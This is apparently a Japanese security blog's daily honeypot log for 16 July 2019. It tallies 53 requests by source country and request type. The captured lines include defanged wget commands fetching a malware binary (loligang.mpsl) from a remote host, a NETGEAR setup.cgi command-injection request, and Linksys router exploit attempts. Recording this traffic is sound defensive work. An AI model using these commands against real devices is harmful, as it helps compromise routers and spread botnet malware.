23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(122日目)

2019/07/16(火)

トータルは53件です。

ハンティングログは以下です。

117.60.94.167 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl
117.60.142.223 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl
82.163.196.108 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl
180.126.159.238 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl
209.45.53.225 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl

www.virustotal.com
www.virustotal.com


IPのロケーション別の件数は以下です。

アメリ 12
中国 7
ブラジル 6
インド 5
イギリス 2
イラン 2
ウクライナ 2
ハンガリー 1
ドイツ 1
ポーランド 1
イタリア 1
ロシア 1
日本 1
ペルー 1
ネパール 1
コスタリカ 1
ベネズエラ 1
エクアドル 1
チェコ 1
エストニア 1
ベトナム 1
オランダ 1
インドネシア 1
オーストラリア 1

f:id:sec23:20190717185140p:plain

件数 概要 リクエス
42 アクセス GET /
5 LinksysルータのEシリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 クローリング HEAD /robots.txt
1 不正中継の調査 GET hxxp[:]//110.249.212[.]46/testget?q=23333&port=80
1 NETGEAR製品の脆弱性を狙った通信?/ GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
1 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
1 Nessusのスキャン GET /error_page.htm
1 JBOSS管理コンソールの調査 GET /admin-console/login.seam